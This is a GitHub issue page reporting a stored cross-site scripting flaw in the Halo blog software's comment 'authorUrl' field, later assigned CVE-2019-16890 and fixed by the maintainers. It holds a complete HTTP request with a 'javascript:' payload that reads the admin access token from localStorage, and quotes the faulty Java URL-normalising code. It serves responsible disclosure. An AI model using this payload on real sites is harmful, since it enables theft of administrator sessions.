We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Enter at the Write Comments
Screenshots :
After the request is successful.
View in the background. For the comment list, click jack01.
XSS vulnerability will be launched.
Hackers can steal localStorage ,Authentication of privileges is halo__Access-Token
Payload
POST /api/content/posts/comments HTTP/1.1 Host: 127.0.0.1:8090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 147 Connection: close
{"author":"jack02","authorUrl":"javascript:alert(localStorage.getItem('halo__Access-Token'));//://","email":"1@2.com","content":"hello","postId":1}
The reason for the vulnerability is an error in authorURL parameter filtering
BaseCommentServiceImpl:
BaseCommentServiceImpl
if (StringUtils.isNotEmpty(comment.getAuthorUrl())) { comment.setAuthorUrl(URLUtil.normalize(comment.getAuthorUrl())); } public static String normalize(String url, boolean isEncodeBody) { if (StrUtil.isBlank(url)) { return url; } final int sepIndex = url.indexOf("://"); String pre; String body; if (sepIndex > 0) { pre = StrUtil.subPre(url, sepIndex + 3); body = StrUtil.subSuf(url, sepIndex + 3); } else { pre = "http://"; body = url; } final int paramsSepIndex = StrUtil.indexOf(body, '?'); String params = null; if (paramsSepIndex > 0) { params = StrUtil.subSuf(body, paramsSepIndex); body = StrUtil.subPre(body, paramsSepIndex); } body = body.replaceAll("^[\\/]+", StrUtil.EMPTY); body = body.replace("\\", "/").replaceAll("//+", "/"); if (isEncodeBody) { body = encode(body); } return pre + body + StrUtil.nullToEmpty(params); }
Ask the author to fix this vulnerability.Thanks
The text was updated successfully, but these errors were encountered:
Thanks for your exploration.
Sorry, something went wrong.
已修复。感谢你的测试反馈。
This was assigned CVE-2019-16890
fix: halo-dev#310 (halo-dev#311)
52d2121
Successfully merging a pull request may close this issue.
Enter at the Write Comments
Screenshots :
After the request is successful.
View in the background. For the comment list, click jack01.
XSS vulnerability will be launched.
Hackers can steal localStorage ,Authentication of privileges is halo__Access-Token
Payload
POST /api/content/posts/comments HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 147
Connection: close
{"author":"jack02","authorUrl":"javascript:alert(localStorage.getItem('halo__Access-Token'));//://","email":"1@2.com","content":"hello","postId":1}
The reason for the vulnerability is an error in authorURL parameter filtering
BaseCommentServiceImpl
:Ask the author to fix this vulnerability.Thanks
The text was updated successfully, but these errors were encountered: